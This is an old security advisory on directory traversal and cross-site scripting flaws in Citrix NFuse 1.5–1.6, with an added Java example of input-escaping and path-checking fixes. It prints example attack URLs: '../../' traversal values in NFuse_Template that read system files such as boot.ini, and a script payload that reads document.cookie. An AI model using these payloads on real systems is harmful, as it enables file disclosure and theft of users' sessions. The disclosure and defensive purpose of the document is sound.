Citrix NFuse directory traversal and cross site scripting



2nd Apr 2002 [SBWID-5225]
COMMAND

	Citrix NFuse directory traversal and cross site scripting

SYSTEMS AFFECTED

	 NFuse 1.5, 1.51, 1.6

	

PROBLEM

	Eric Budke [http://www.foundstone.com] posted :
	

	A command such as:
	

	http://10.x.x.x/boilerplate.asp?NFuse_Template=template.ica&NFuse_Application=Attorneyx0020Homex0020Directory&NFuse_MIMEExtension=.ica 

	

	Can be replaced with one like this:
	

	http://10.x.x.x/boilerplate.asp?NFuse_Template=../../winnt/system32/axperf.ini&NFuse_CurrentFolder=/ 

	

	It seems to work with things in winnt and winnt/system32, it doesn't
	seem to like things back on the c:\ which gives up its very minor vuln
	of the path of wwwroot.
	

	http://10.x.x.x/boilerplate.asp?NFuse_Template=../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories 

	

	Gives up:
	

	There was an error:The Citrix HTML template specified does not exist or
	could not be accessed. The template file specified was:
	c:\inetpub\wwwroot\../../boot.ini

	

	-Also-
	

	Eric DETOISIEN of GLOBAL SECURE [http://www.global-secure.fr] says :
	

	NFuse provides several jsp (or asp) pages to make a portal. In one of
	these pages (launch.jsp or launch.asp) it's possible to use the method
	getLastError() of the TemplateParser object (in fact this method is
	inherited from the WebPNObject object).
	

	The CSS problem comes  from  the  getLastError()  method.  It  does  not
	filter the URL parameters that cause the problem.
	

	 Example :

	 =======

	

	if your launch.jsp contains a bit of code like this :
	

	if (!parser.Parse())
	{
	    out.println("Error: " + parser.getLastError());
	}
	else
	{
	...
	}

	

	With a request like this you can get the cookie with login and  password
	(the user must be connected before) :
	

	http://my_nfuse_portal.com/launch.jsp?NFuse_Application=<script>alert(document.cookie);</script>

	

SOLUTION

	The directory traversal bug is presumably solved in v1.6. As for the
	cross site scripting, do not print the result of GetLastError(), or
	filter the result before printing it.
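
	An added Java example (not Citrix's code and not from either poster) of the two checks the problems above call for: HTML-encoding an error string such as the result of getLastError() before it is printed, and refusing an NFuse_Template value that resolves outside the template directory. The class name, the TEMPLATE_DIR path and the sample inputs are assumptions made for illustration.

```java
import java.io.IOException;
import java.nio.file.InvalidPathException;
import java.nio.file.Path;
import java.nio.file.Paths;

public class NFuseInputChecks {
    // Assumed template directory (hypothetical path, not taken from the advisory).
    static final Path TEMPLATE_DIR = Paths.get("/srv/nfuse/templates").toAbsolutePath().normalize();

    // HTML-encode text before writing it into a page, e.g. the result of getLastError().
    static String escapeHtml(String s) {
        StringBuilder sb = new StringBuilder();
        for (char c : s.toCharArray()) {
            switch (c) {
                case '&': sb.append("&amp;"); break;
                case '<': sb.append("&lt;"); break;
                case '>': sb.append("&gt;"); break;
                case '"': sb.append("&quot;"); break;
                case '\'': sb.append("&#39;"); break;
                default: sb.append(c);
            }
        }
        return sb.toString();
    }

    // Resolve an NFuse_Template value; reject anything that normalizes to a path outside TEMPLATE_DIR.
    static Path resolveTemplate(String name) throws IOException {
        if (name == null || name.isEmpty()) throw new IOException("no template name");
        Path p;
        try {
            p = TEMPLATE_DIR.resolve(name.replace('\\', '/')).normalize();
        } catch (InvalidPathException e) {
            throw new IOException("invalid template name");
        }
        if (!p.startsWith(TEMPLATE_DIR) || p.equals(TEMPLATE_DIR)) throw new IOException("outside template directory");
        return p;
    }

    public static void main(String[] args) {
        // Constructed inputs modelled on the parameter values quoted in the advisory.
        String[] templates = { "template.ica", "../../winnt/system32/axperf.ini", "../../boot.ini" };
        for (String t : templates) {
            try { System.out.println("ok      " + resolveTemplate(t)); }
            catch (IOException e) { System.out.println("refused " + escapeHtml(t) + " (" + e.getMessage() + ")"); }
        }
        String lastError = "Application <script>alert(document.cookie);</script> not found"; // constructed
        System.out.println("Error: " + escapeHtml(lastError));
    }
}
```

	The refusal message carries only a fixed reason, so the server-side path that the quoted error message disclosed is never sent to the client.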

